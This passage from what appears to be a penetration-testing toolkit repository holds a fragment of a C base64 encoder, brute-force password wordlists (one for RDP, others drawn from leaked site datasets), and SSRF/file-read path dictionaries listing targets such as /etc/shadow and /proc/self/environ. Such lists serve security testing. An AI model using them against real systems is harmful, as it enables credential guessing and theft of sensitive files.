char)0x0F); 28 | base64[j++] = base64Table[(int)current]; 29 | 30 | current = ((unsigned char)(bindata[i + 1] << 2)) & 
((unsigned char)0x3C); 31 | if (i + 2 >= binlength) 32 | { 33 | base64[j++] = base64Table[(int)current]; 34 | base64[j++] = '='; 35 | break; 36 | } 37 | current |= ((unsigned char)(bindata[i + 2] >> 6)) & ((unsigned char)0x03); 38 | base64[j++] = base64Table[(int)current]; 39 | 40 | current = ((unsigned char)bindata[i + 2]) & ((unsigned char)0x3F); 41 | base64[j++] = base64Table[(int)current]; 42 | } 43 | base64[j] = '\0'; 44 | return base64; 45 | } 46 | 47 | int main(int argc, char ** argv){ 48 | unsigned char bindata[2048]; 49 | char base64[4096]; 50 | if(argc > 1){ 51 | // sprintf(bindata, argv[1]); 52 | printf("%s\n", base64_encode(bindata, base64, 2048)); 53 | }else{ 54 | printf("Error : argc=%d < 2\n", argc); 55 | } 56 | } -------------------------------------------------------------------------------- /dict/dicts.py: -------------------------------------------------------------------------------- 1 | def ssrf(): 2 | dicts = load_dict('./../vFuckingTools/dict/ssrf/ssrf.dic') 3 | for i in dicts: 4 | fn = i.replace('\n', '') 5 | -------------------------------------------------------------------------------- /dict/dir/5.php.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/dict/dir/5.php.txt -------------------------------------------------------------------------------- /dict/dir/raft-large-files.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/dict/dir/raft-large-files.txt -------------------------------------------------------------------------------- /dict/password/12306-14W-top100.txt: -------------------------------------------------------------------------------- 1 | 123456 2 | a123456 3 | 123456a 4 | 5201314 5 | 111111 6 | woaini1314 7 | qq123456 8 | 123123 9 | 000000 10 | 1qaz2wsx 11 | 
1q2w3e4r 12 | qwe123 13 | 7758521 14 | 123qwe 15 | a123123 16 | 123456aa 17 | woaini520 18 | woaini 19 | 100200 20 | 1314520 21 | woaini123 22 | 123321 23 | q123456 24 | 123456789 25 | 123456789a 26 | 5211314 27 | asd123 28 | a123456789 29 | z123456 30 | asd123456 31 | a5201314 32 | aa123456 33 | zhang123 34 | aptx4869 35 | 123123a 36 | 1q2w3e4r5t 37 | 1qazxsw2 38 | 5201314a 39 | 1q2w3e 40 | aini1314 41 | 31415926 42 | q1w2e3r4 43 | 123456qq 44 | woaini521 45 | 1234qwer 46 | a111111 47 | 520520 48 | iloveyou 49 | abc123 50 | 110110 51 | 111111a 52 | 123456abc 53 | w123456 54 | 7758258 55 | 123qweasd 56 | 159753 57 | qwer1234 58 | a000000 59 | qq123123 60 | zxc123 61 | 123654 62 | abc123456 63 | 123456q 64 | qq5201314 65 | 12345678 66 | 000000a 67 | 456852 68 | as123456 69 | 1314521 70 | 112233 71 | 521521 72 | qazwsx123 73 | zxc123456 74 | abcd1234 75 | asdasd 76 | 666666 77 | love1314 78 | QAZ123 79 | aaa123 80 | q1w2e3 81 | aaaaaa 82 | a123321 83 | 123000 84 | 11111111 85 | 12qwaszx 86 | 5845201314 87 | s123456 88 | nihao123 89 | caonima123 90 | zxcvbnm123 91 | wang123 92 | 159357 93 | 1A2B3C4D 94 | asdasd123 95 | 584520 96 | 753951 97 | 147258 98 | 1123581321 99 | 110120 100 | qq1314520 101 | -------------------------------------------------------------------------------- /dict/password/3389爆破字典.txt: -------------------------------------------------------------------------------- 1 | 123456.com 2 | 123123 3 | idc123!@# 4 | 123 5 | aaa123!@# 6 | qq123.com 7 | 123456 8 | wantian##*( 9 | qwe123 10 | qwe1234 11 | 123qwe 12 | 123qwer 13 | 1qaz2wsx 14 | 1qaz 15 | 159753 16 | !Q@W#E 17 | 159357 18 | 147369 19 | 1234567 20 | password 21 | aistar123<>!N 22 | 321 23 | idcji2010 24 | qqqqqq 25 | 1q2w3e 26 | q1w2e3 27 | 336699 28 | abc123 29 | asd123 30 | 123654 31 | 1 32 | 111111 33 | 111 34 | 111qqq... 35 | 123456 36 | 953139. 37 | 0258 38 | 111qqq!!! 
39 | 1236 40 | qqii 41 | tyinfo 42 | abcd36888 43 | rst_login 44 | OAOidc 45 | OAOidc123!@# 46 | OAOidc123 47 | esin888 48 | qwer 49 | power123 50 | power.liu 51 | power.yu 52 | dns99+588 53 | zhengui 54 | idc0.1 55 | 7715123 56 | sdwer 57 | power.zhao 58 | sdwer123 59 | qwer1234 60 | esincs 61 | jspower123.0 62 | 5656789 63 | 2323456 64 | power.com 65 | power123.0 66 | power0.123 67 | jspower.com 68 | 123123 69 | hlwj0519-1205.jf 70 | 123321 71 | zaxscdvf 72 | ..0 73 | !@#$QWER 74 | 95313 75 | 1231321 76 | 321123 77 | vipnew 78 | idc0514 79 | 1235698 80 | 235689 81 | 326598 82 | 112233 83 | 111222 84 | qqqqqq 85 | idc11 86 | 21vianet 87 | #@!ewq 88 | 1010 89 | 111qqq 90 | 1234%^&* 91 | 12345^&*() 92 | 123456 93 | 4867086 94 | 1234567 95 | 123!@# 96 | 123456!@# 97 | 10000 98 | 794613 99 | 784512 100 | 895623 101 | 789456 102 | 456123 103 | 654321 104 | 123!@# 105 | 1234!@#$ 106 | 11185 107 | 12345!@#$% 108 | qwe123!@# 109 | !@#123 110 | !@#321 111 | 123#@! 112 | 19861212 113 | 19831212 114 | 19841020 115 | #@!123 116 | #@!321 117 | idcidc 118 | 12345^&*() 119 | !@#$%^&*() 120 | )(*&^%$#@! 121 | 0987654321 122 | tyidc 123 | 1122 124 | 111222 125 | idc123 126 | idcidcok 127 | idcuser 128 | abcd1234 129 | 1234abcd 130 | caonima 131 | 1q2w3e4r 132 | 888888 133 | admin!@# 134 | abc!@# 135 | !Q@W#E$R%T 136 | idc2010 137 | 1236 138 | 1q2w3e4r5t 139 | qqaazz 140 | asdasd 141 | admin 142 | admin1 143 | admin123 144 | aaa111 145 | 111aaa 146 | 123aaa 147 | lh222 148 | lhidc 149 | 123a 150 | a123 151 | 123456a 152 | a123456 153 | aaa123 154 | qazwsx 155 | qazxsw 156 | 0123 157 | 123112233 158 | 123111 159 | www.7x24.cn 160 | shisp.net 161 | 123000 162 | idc0123 163 | 1230.. 
164 | 123456789 165 | 123456qwe 166 | 123qwe 167 | 12345qwert 168 | zxcvbnm 169 | qwerty 170 | qweqwe 171 | q1w2e3 172 | 123ewq 173 | qwe321 174 | 1qazxsw2 175 | 12qwaszx 176 | 1234rewq 177 | 123456.com 178 | lituobestsanmao 179 | !@#19841010 180 | 19885510 181 | xyidc_2006 182 | 95217189 183 | 95217 184 | chinayixun 185 | huachen1258zz 186 | sanhe123 187 | 3H8IDC!!# 188 | 3H8IDC72sanhe000 189 | xiaoyili 190 | sanhe000~!@# 191 | 3H8IDC!!# 192 | ccfeng66131421 193 | !@#59560955 194 | tkggja850518`1 195 | zhengui 196 | anada325!@# 197 | www.txwscx.comsritgyxf2sxy19831122zx 198 | ZHONGGUO$#@!999@ 199 | admin13906271234 200 | 395835961 201 | senlinyan 202 | 3203672 203 | 9527999!!! 204 | P@ssw0rd 205 | huaiyukeji115 206 | idc9aewr42 207 | idc0.1 208 | 123asdasd 209 | qsx6059410172. 210 | idc0001 211 | idc800888 212 | idc46121 213 | 123asdasd 214 | 882627.8 215 | luofei520!@#123 216 | 852799!!! 217 | idc0123.0 218 | 513tyml.com 219 | abc123!@# 220 | 1q2w3e,./? >< 221 | 6504710shuazuan 222 | 123.789+ 223 | 123asdasd 224 | 752883855. 225 | senlinyan$ 226 | admin001 227 | 6695zx 228 | scictd9821622 229 | 365obsserver! 
230 | ranglm123456 231 | 13920225257 232 | idc925111 233 | 1qaz@wsx#edc 234 | .......199 235 | xu15817079919 236 | yanjin0429 237 | zhangznw 238 | 13527380230 239 | idc0.01 240 | idc123&123 241 | 662766 242 | 122.224 243 | huaiyukeji115 244 | .......199@ 245 | liuzhangzi1988 246 | 123456!@#$%^ 247 | idc0123 248 | dahouzi110 249 | 123.789+ 250 | trista188#** 251 | mm1237 252 | 07736056123 253 | TnHoo15862380404 254 | idc0123 255 | 189532210113 256 | idc123 257 | gedingfeng1102888 -------------------------------------------------------------------------------- /dict/password/Defaultpass.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/dict/password/Defaultpass.txt -------------------------------------------------------------------------------- /dict/password/adobe100.txt: -------------------------------------------------------------------------------- 1 | 123456 2 | 123456789 3 | password 4 | adobe123 5 | 12345678 6 | qwerty 7 | 1234567 8 | 111111 9 | photoshop 10 | 123123 11 | 1234567890 12 | 000000 13 | abc123 14 | 1234 15 | adobe1 16 | macromedia 17 | azerty 18 | iloveyou 19 | aaaaaa 20 | 654321 21 | 12345 22 | 666666 23 | sunshine 24 | 123321 25 | letmein 26 | monkey 27 | asdfgh 28 | password1 29 | shadow 30 | princess 31 | dragon 32 | adobeadobe 33 | daniel 34 | computer 35 | michael 36 | 121212 37 | charlie 38 | master 39 | superman 40 | qwertyuiop 41 | 112233 42 | asdfasdf 43 | jessica 44 | 1q2w3e4r 45 | welcome 46 | 1qaz2wsx 47 | 987654321 48 | fdsa 49 | 753951 50 | chocolate 51 | fuckyou 52 | soccer 53 | tigger 54 | asdasd 55 | thomas 56 | asdfghjkl 57 | internet 58 | michelle 59 | football 60 | 123qwe 61 | zxcvbnm 62 | dreamweaver 63 | 7777777 64 | maggie 65 | qazwsx 66 | baseball 67 | jennifer 68 | jordan 69 | abcd1234 70 | trustno1 71 | buster 72 | 555555 73 | liverpool 74 | abc 75 | whatever 76 | 11111111 77 | 102030 78 | 
123123123 79 | andrea 80 | pepper 81 | nicole 82 | killer 83 | abcdef 84 | hannah 85 | test 86 | alexander 87 | andrew 88 | 222222 89 | joshua 90 | freedom 91 | samsung 92 | asdfghj 93 | purple 94 | ginger 95 | 123654 96 | matrix 97 | secret 98 | summer 99 | 1q2w3e 100 | snoopy1 101 | -------------------------------------------------------------------------------- /dict/password/passwords.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/dict/password/passwords.txt -------------------------------------------------------------------------------- /dict/password/phpbb.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/dict/password/phpbb.txt -------------------------------------------------------------------------------- /dict/password/simple-pass.txt: -------------------------------------------------------------------------------- 1 | root 2 | msfadmin 3 | sshd 4 | 123456 5 | 12345 6 | 1234 7 | 123 8 | password 9 | p@ssword 10 | 12345 11 | test123 12 | passwd 13 | P@ssw0rd 14 | P@ssw0rd1 15 | p@ssw0rd 16 | apache 17 | ssh 18 | administrator 19 | admin 20 | administration 21 | support 22 | service 23 | info 24 | superadmin 25 | sales 26 | user 27 | postgres 28 | mysql 29 | oracle 30 | guest 31 | test 32 | checking 33 | god 34 | system 35 | systemadmin 36 | systemadministrator 37 | www-data 38 | mailadmin 39 | webmaster 40 | tomcat -------------------------------------------------------------------------------- /dict/password/tianya-top-1w.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/dict/password/tianya-top-1w.txt 
-------------------------------------------------------------------------------- /dict/password/top100password.txt: -------------------------------------------------------------------------------- 1 | 123456789 2 | a123456 3 | 123456 4 | a123456789 5 | 1234567890 6 | woaini1314 7 | qq123456 8 | abc123456 9 | 123456a 10 | 123456789a 11 | 147258369 12 | zxcvbnm 13 | 987654321 14 | 12345678910 15 | abc123 16 | qq123456789 17 | 123456789. 18 | 7708801314520 19 | woaini 20 | 5201314520 21 | q123456 22 | 123456abc 23 | 1233211234567 24 | 123123123 25 | 123456. 26 | 0123456789 27 | asd123456 28 | aa123456 29 | 135792468 30 | q123456789 31 | abcd123456 32 | 12345678900 33 | woaini520 34 | woaini123 35 | zxcvbnm123 36 | 1111111111111111 37 | w123456 38 | aini1314 39 | abc123456789 40 | 111111 41 | woaini521 42 | qwertyuiop 43 | 1314520520 44 | 1234567891 45 | qwe123456 46 | asd123 47 | 000000 48 | 1472583690 49 | 1357924680 50 | 789456123 51 | 123456789abc 52 | z123456 53 | 1234567899 54 | aaa123456 55 | abcd1234 56 | www123456 57 | 123456789q 58 | 123abc 59 | qwe123 60 | w123456789 61 | 7894561230 62 | 123456qq 63 | zxc123456 64 | 123456789qq 65 | 1111111111 66 | 111111111 67 | 0000000000000000 68 | 1234567891234567 69 | qazwsxedc 70 | qwerty 71 | 123456.. 72 | zxc123 73 | asdfghjkl 74 | 0000000000 75 | 1234554321 76 | 123456q 77 | 123456aa 78 | 9876543210 79 | 110120119 80 | qaz123456 81 | qq5201314 82 | 123698745 83 | 5201314 84 | 000000000 85 | as123456 86 | 123123 87 | 5841314520 88 | z123456789 89 | 52013145201314 90 | a123123 91 | caonima 92 | a5201314 93 | wang123456 94 | abcd123 95 | 123456789.. 
96 | woaini1314520 97 | 123456asd 98 | aa123456789 99 | 741852963 100 | a12345678 -------------------------------------------------------------------------------- /dict/password/twitter.txt: -------------------------------------------------------------------------------- 1 | 111111 2 | 11111111 3 | 112233 4 | 121212 5 | 123123 6 | 123456 7 | 1234567 8 | 12345678 9 | 131313 10 | 232323 11 | 654321 12 | 666666 13 | 696969 14 | 777777 15 | 7777777 16 | 8675309 17 | 987654 18 | aaaaaa 19 | abc123 20 | abc123 21 | abcdef 22 | abgrtyu 23 | access 24 | access14 25 | action 26 | albert 27 | alexis 28 | amanda 29 | amateur 30 | andrea 31 | andrew 32 | angela 33 | angels 34 | animal 35 | anthony 36 | apollo 37 | apples 38 | arsenal 39 | arthur 40 | asdfgh 41 | asdfgh 42 | ashley 43 | august 44 | austin 45 | badboy 46 | bailey 47 | banana 48 | barney 49 | baseball 50 | batman 51 | beaver 52 | beavis 53 | bigdaddy 54 | bigdog 55 | birdie 56 | bitches 57 | biteme 58 | blazer 59 | blonde 60 | blondes 61 | bond007 62 | bonnie 63 | booboo 64 | booger 65 | boomer 66 | boston 67 | brandon 68 | brandy 69 | braves 70 | brazil 71 | bronco 72 | broncos 73 | bulldog 74 | buster 75 | butter 76 | butthead 77 | calvin 78 | camaro 79 | cameron 80 | canada 81 | captain 82 | carlos 83 | carter 84 | casper 85 | charles 86 | charlie 87 | cheese 88 | chelsea 89 | chester 90 | chicago 91 | chicken 92 | cocacola 93 | coffee 94 | college 95 | compaq 96 | computer 97 | cookie 98 | cooper 99 | corvette 100 | cowboy 101 | cowboys 102 | crystal 103 | dakota 104 | dallas 105 | daniel 106 | danielle 107 | debbie 108 | dennis 109 | diablo 110 | diamond 111 | doctor 112 | doggie 113 | dolphin 114 | dolphins 115 | donald 116 | dragon 117 | dreams 118 | driver 119 | eagle1 120 | eagles 121 | edward 122 | einstein 123 | erotic 124 | extreme 125 | falcon 126 | fender 127 | ferrari 128 | firebird 129 | fishing 130 | florida 131 | flower 132 | flyers 133 | football 134 | forever 135 | freddy 136 | freedom 137 | 
gandalf 138 | gateway 139 | gators 140 | gemini 141 | george 142 | giants 143 | ginger 144 | golden 145 | golfer 146 | gordon 147 | gregory 148 | guitar 149 | gunner 150 | hammer 151 | hannah 152 | hardcore 153 | harley 154 | heather 155 | helpme 156 | hockey 157 | hooters 158 | horney 159 | hotdog 160 | hunter 161 | hunting 162 | iceman 163 | iloveyou 164 | internet 165 | iwantu 166 | jackie 167 | jackson 168 | jaguar 169 | jasmine 170 | jasper 171 | jennifer 172 | jeremy 173 | jessica 174 | johnny 175 | johnson 176 | jordan 177 | joseph 178 | joshua 179 | junior 180 | justin 181 | killer 182 | knight 183 | ladies 184 | lakers 185 | lauren 186 | leather 187 | legend 188 | letmein 189 | little 190 | london 191 | lovers 192 | maddog 193 | madison 194 | maggie 195 | magnum 196 | marine 197 | marlboro 198 | martin 199 | marvin 200 | master 201 | matrix 202 | matthew 203 | maverick 204 | maxwell 205 | melissa 206 | member 207 | mercedes 208 | merlin 209 | michael 210 | michelle 211 | mickey 212 | midnight 213 | miller 214 | mistress 215 | monica 216 | monkey 217 | monkey 218 | monster 219 | morgan 220 | mother 221 | mountain 222 | muffin 223 | murphy 224 | mustang 225 | naked 226 | nascar 227 | nathan 228 | naughty 229 | ncc1701 230 | newyork 231 | nicholas 232 | nicole 233 | nipple 234 | nipples 235 | oliver 236 | orange 237 | packers 238 | panther 239 | panties 240 | parker 241 | password 242 | password 243 | password1 244 | password12 245 | password123 246 | patrick 247 | peaches 248 | peanut 249 | pepper 250 | phantom 251 | phoenix 252 | player 253 | please 254 | pookie 255 | porsche 256 | prince 257 | princess 258 | private 259 | purple 260 | pussies 261 | qazwsx 262 | qwerty 263 | qwertyui 264 | rabbit 265 | rachel 266 | racing 267 | raiders 268 | rainbow 269 | ranger 270 | rangers 271 | rebecca 272 | redskins 273 | redsox 274 | redwings 275 | richard 276 | robert 277 | rocket 278 | rosebud 279 | runner 280 | rush2112 281 | russia 282 | samantha 283 | sammy 284 | 
samson 285 | sandra 286 | saturn 287 | scooby 288 | scooter 289 | scorpio 290 | scorpion 291 | secret 292 | sexsex 293 | shadow 294 | shannon 295 | shaved 296 | sierra 297 | silver 298 | skippy 299 | slayer 300 | smokey 301 | snoopy 302 | soccer 303 | sophie 304 | spanky 305 | sparky 306 | spider 307 | squirt 308 | srinivas 309 | startrek 310 | starwars 311 | steelers 312 | steven 313 | sticky 314 | stupid 315 | success 316 | summer 317 | sunshine 318 | superman 319 | surfer 320 | swimming 321 | sydney 322 | taylor 323 | tennis 324 | teresa 325 | tester 326 | testing 327 | theman 328 | thomas 329 | thunder 330 | thx1138 331 | tiffany 332 | tigers 333 | tigger 334 | tomcat 335 | topgun 336 | toyota 337 | travis 338 | trouble 339 | trustno1 340 | tucker 341 | turtle 342 | twitter 343 | united 344 | vagina 345 | victor 346 | victoria 347 | viking 348 | voodoo 349 | voyager 350 | walter 351 | warrior 352 | welcome 353 | whatever 354 | william 355 | willie 356 | wilson 357 | winner 358 | winston 359 | winter 360 | wizard 361 | xavier 362 | xxxxxx 363 | xxxxxxxx 364 | yamaha 365 | yankee 366 | yankees 367 | yellow 368 | zxcvbn 369 | zxcvbnm 370 | zzzzzz 371 | -------------------------------------------------------------------------------- /dict/password/字典.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/dict/password/字典.txt -------------------------------------------------------------------------------- /dict/password/渗透字典.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/dict/password/渗透字典.txt -------------------------------------------------------------------------------- /dict/password/自己收集的密码.txt: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/dict/password/自己收集的密码.txt -------------------------------------------------------------------------------- /dict/ssrf/config.dic: -------------------------------------------------------------------------------- 1 | /NetServer/bin/stable/apache/php.ini 2 | /PHP/php.ini 3 | /Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf 4 | /Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf 5 | /Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf 6 | /Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php 7 | /Volumes/Macintosh_HD1/usr/local/php/lib/php.ini 8 | /Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php 9 | /Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php 10 | /Volumes/webBackup/opt/apache2/conf/httpd.conf 11 | /Volumes/webBackup/private/etc/httpd/httpd.conf 12 | /Volumes/webBackup/private/etc/httpd/httpd.conf.default 13 | /apache/php/php.ini 14 | /bin/php.ini 15 | /etc/apache/conf/httpd.conf 16 | /etc/apache2/apache2.conf 17 | /etc/apache2/conf/httpd.conf 18 | /etc/apache2/httpd.conf 19 | /etc/chrootUsers 20 | /etc/ftpchroot 21 | /etc/ftphosts/etc/motd 22 | /etc/group 23 | /etc/http/conf/httpd.conf 24 | /etc/http/httpd.conf 25 | /etc/httpd.conf 26 | /etc/httpd/conf/httpd.conf 27 | /etc/httpd/httpd.conf 28 | /etc/httpd/php.ini 29 | /etc/issue 30 | /etc/logrotate.d/ftp 31 | /etc/logrotate.d/proftpd 32 | /etc/my.cnf 33 | /etc/mysql/my.cnf 34 | /etc/passwd 35 | /etc/php.ini 36 | /etc/php/apache/php.ini 37 | /etc/php/apache2/php.ini 38 | /etc/php/cgi/php.ini 39 | /etc/php/php.ini 40 | /etc/php/php4/php.ini 41 | /etc/php4.4/fcgi/php.ini 42 | /etc/php4/apache/php.ini 43 | /etc/php4/apache2/php.ini 44 | /etc/php4/cgi/php.ini 45 | /etc/php5/apache/php.ini 46 | /etc/php5/apache2/php.ini 47 | /etc/php5/cgi/php.ini 48 | /etc/proftp.conf 49 | /etc/proftpd/modules.conf 50 | /etc/protpd/proftpd.conf 51 | /etc/pure-ftpd.conf 52 | /etc/pure-ftpd/pure-ftpd.conf 53 | /etc/pure-ftpd/pure-ftpd.pdb 54 
| /etc/pure-ftpd/pureftpd.pdb 55 | /etc/pureftpd.passwd 56 | /etc/pureftpd.pdb 57 | /etc/security/environ 58 | /etc/security/group 59 | /etc/security/limits 60 | /etc/security/passwd 61 | /etc/security/user 62 | /etc/shadow 63 | /etc/vhcs2/proftpd/proftpd.conf 64 | /etc/vsftpd.chroot_list 65 | /etc/vsftpd.conf 66 | /etc/vsftpd/vsftpd.conf 67 | /etc/wu-ftpd/ftphosts 68 | /etc/wu-ftpd/ftpusers 69 | /home/bin/stable/apache/php.ini 70 | /home2/bin/stable/apache/php.ini 71 | /opt/apache/conf/httpd.conf 72 | /opt/apache2/conf/httpd.conf 73 | /opt/xampp/etc/php.ini 74 | /php/php.ini 75 | /php4/php.ini 76 | /php5/php.ini 77 | /private/etc/httpd/httpd.conf 78 | /private/etc/httpd/httpd.conf.default 79 | /usr/apache/conf/httpd.conf 80 | /usr/apache2/conf/httpd.conf 81 | /usr/etc/pure-ftpd.conf 82 | /usr/lib/php.ini 83 | /usr/lib/php/php.ini 84 | /usr/lib/security/mkuser.default 85 | /usr/local/Zend/etc/php.ini 86 | /usr/local/apache/conf/httpd.conf 87 | /usr/local/apache/conf/php.ini 88 | /usr/local/apache/httpd.conf 89 | /usr/local/apache2/conf/httpd.conf 90 | /usr/local/apache2/httpd.conf 91 | /usr/local/apps/apache/conf/httpd.conf 92 | /usr/local/apps/apache2/conf/httpd.conf 93 | /usr/local/etc/apache/conf/httpd.conf 94 | /usr/local/etc/apache/vhosts.conf 95 | /usr/local/etc/apache2/conf/httpd.conf 96 | /usr/local/etc/httpd/conf/httpd.conf 97 | /usr/local/etc/php.ini 98 | /usr/local/etc/pure-ftpd.conf 99 | /usr/local/etc/pureftpd.pdb 100 | /usr/local/httpd/conf/httpd.conf 101 | /usr/local/lib/php.ini 102 | /usr/local/php/httpd.conf 103 | /usr/local/php/httpd.conf.php 104 | /usr/local/php/lib/php.ini 105 | /usr/local/php4/httpd.conf 106 | /usr/local/php4/httpd.conf.php 107 | /usr/local/php4/lib/php.ini 108 | /usr/local/php5/httpd.conf 109 | /usr/local/php5/httpd.conf.php 110 | /usr/local/php5/lib/php.ini 111 | /usr/local/pureftpd/etc/pure-ftpd.conf 112 | /usr/local/pureftpd/etc/pureftpd.pdb 113 | /usr/local/pureftpd/sbin/pure-config.pl 114 | /usr/pkgsrc/net/pureftpd/ 115 | 
/usr/ports/contrib/pure-ftpd/ 116 | /usr/ports/net/pure-ftpd/ 117 | /usr/sbin/pure-config.pl 118 | /var/lib/mysql/my.cnf 119 | /var/local/www/conf/php.ini 120 | /var/www/conf/httpd.conf 121 | /web/conf/php.ini 122 | /xampp/apache/bin/php.ini 123 | -------------------------------------------------------------------------------- /dict/ssrf/deal_log.py: -------------------------------------------------------------------------------- 1 | def ddddd(dic): 2 | o = [] 3 | with open(dic) as f: 4 | o = f.readlines() 5 | print len(o) 6 | o = sorted(list(set(o))) 7 | print len(o) 8 | # with open(dic, 'w') as f: 9 | # for i in o: 10 | # f.write(i) 11 | 12 | 13 | if __name__ == '__main__': 14 | ddddd('./ssrf.dic') 15 | pass 16 | -------------------------------------------------------------------------------- /dict/ssrf/log.dic: -------------------------------------------------------------------------------- 1 | /Program Files/Apache Group/Apache/logs/access.log 2 | /Program Files/Apache Group/Apache/logs/error.log 3 | /apache/logs/access.log 4 | /apache/logs/error.log 5 | /apache2/logs/access.log 6 | /apache2/logs/error.log 7 | /etc/httpd/logs/acces.log 8 | /etc/httpd/logs/acces_log 9 | /etc/httpd/logs/access.log 10 | /etc/httpd/logs/access_log 11 | /etc/httpd/logs/error.log 12 | /etc/httpd/logs/error_log 13 | /etc/logrotate.d/vsftpd.log 14 | /etc/wu-ftpd/ftpaccess 15 | /logs/access.log 16 | /logs/access_log 17 | /logs/error.log 18 | /logs/error_log 19 | /logs/pure-ftpd.log 20 | /opt/lampp/logs/access.log 21 | /opt/lampp/logs/access_log 22 | /opt/lampp/logs/error.log 23 | /opt/lampp/logs/error_log 24 | /opt/xampp/logs/access.log 25 | /opt/xampp/logs/access_log 26 | /opt/xampp/logs/error.log 27 | /opt/xampp/logs/error_log 28 | /usr/local/apache/log 29 | /usr/local/apache/logs 30 | /usr/local/apache/logs/access.log 31 | /usr/local/apache/logs/access_log 32 | /usr/local/apache/logs/error.log 33 | /usr/local/apache/logs/error_log 34 | /usr/local/apache2/logs/access.log 35 | 
/usr/local/apache2/logs/access_log 36 | /usr/local/apache2/logs/error.log 37 | /usr/local/apache2/logs/error_log 38 | /usr/local/cpanel/logs 39 | /usr/local/cpanel/logs/access_log 40 | /usr/local/cpanel/logs/error_log 41 | /usr/local/cpanel/logs/license_log 42 | /usr/local/cpanel/logs/login_log 43 | /usr/local/cpanel/logs/stats_log 44 | /usr/local/etc/httpd/logs/access_log 45 | /usr/local/etc/httpd/logs/error_log 46 | /usr/local/www/logs/thttpd_log 47 | /var/adm/log/xferlog 48 | /var/apache/logs/access_log 49 | /var/apache/logs/error_log 50 | /var/cpanel/cpanel.config 51 | /var/log/access.log 52 | /var/log/access_log 53 | /var/log/apache-ssl/access.log 54 | /var/log/apache-ssl/error.log 55 | /var/log/apache/access.log 56 | /var/log/apache/access_log 57 | /var/log/apache/error.log 58 | /var/log/apache/error_log 59 | /var/log/apache2/access.log 60 | /var/log/apache2/access_log 61 | /var/log/apache2/error.log 62 | /var/log/apache2/error_log 63 | /var/log/error.log 64 | /var/log/error_log 65 | /var/log/exim/mainlog 66 | /var/log/exim/paniclog 67 | /var/log/exim/rejectlog 68 | /var/log/exim_mainlog 69 | /var/log/exim_paniclog 70 | /var/log/exim_rejectlog 71 | /var/log/ftp-proxy 72 | /var/log/ftp-proxy/ftp-proxy.log 73 | /var/log/ftplog/var/log/httpd/access_log 74 | /var/log/httpd/error_log 75 | /var/log/httpsd/ssl.access_log 76 | /var/log/httpsd/ssl_log 77 | /var/log/maillog 78 | /var/log/mysql.log 79 | /var/log/mysql/mysql-bin.log 80 | /var/log/mysql/mysql-slow.log 81 | /var/log/mysql/mysql.log 82 | /var/log/mysqlderror.log 83 | /var/log/proftpd/var/www/logs/access.log 84 | /var/log/pure-ftpd/pure-ftpd.log 85 | /var/log/pureftpd.log 86 | /var/log/thttpd_log 87 | /var/log/vsftpd.log 88 | /var/log/xferlog 89 | /var/mysql.log 90 | /var/www/log/access_log 91 | /var/www/log/error_log 92 | /var/www/logs/access_log 93 | /var/www/logs/error.log 94 | /var/www/logs/error_log 95 | /var/www/mgr/logs/access.log 96 | /var/www/mgr/logs/access_log 97 | /var/www/mgr/logs/error.log 98 | 
/var/www/mgr/logs/error_log 99 | /www/logs/proftpd.system.log 100 | -------------------------------------------------------------------------------- /dict/ssrf/proc.dic: -------------------------------------------------------------------------------- 1 | /proc/cmdline 2 | /proc/mounts 3 | /proc/net/arp 4 | /proc/net/fib_trie 5 | /proc/net/route 6 | /proc/net/tcp 7 | /proc/net/udp 8 | /proc/sched_debug 9 | /proc/self/fd/26 10 | /proc/self/cmdline 11 | /proc/self/cwd 12 | /proc/self/environ 13 | /proc/self/fd/0 14 | /proc/self/fd/1 15 | /proc/self/fd/10 16 | /proc/self/fd/11 17 | /proc/self/fd/12 18 | /proc/self/fd/13 19 | /proc/self/fd/14 20 | /proc/self/fd/15 21 | /proc/self/fd/16 22 | /proc/self/fd/17 23 | /proc/self/fd/18 24 | /proc/self/fd/19 25 | /proc/self/fd/2 26 | /proc/self/fd/20 27 | /proc/self/fd/21 28 | /proc/self/fd/22 29 | /proc/self/fd/23 30 | /proc/self/fd/24 31 | /proc/self/fd/25 32 | /proc/self/fd/27 33 | /proc/self/fd/28 34 | /proc/self/fd/29 35 | /proc/self/fd/3 36 | /proc/self/fd/30 37 | /proc/self/fd/31 38 | /proc/self/fd/32 39 | /proc/self/fd/33 40 | /proc/self/fd/34 41 | /proc/self/fd/35 42 | /proc/self/fd/4 43 | /proc/self/fd/5 44 | /proc/self/fd/6 45 | /proc/self/fd/7 46 | /proc/self/fd/8 47 | /proc/self/fd/9 48 | /proc/self/stat 49 | /proc/self/status 50 | /proc/verison 51 | -------------------------------------------------------------------------------- /dict/web/ASP.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/dict/web/ASP.txt -------------------------------------------------------------------------------- /dict/web/ASPX.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/virink/vFuckingTools/71cafcf60b347d09ff5c62fb9d7a27daea85b5e2/dict/web/ASPX.txt 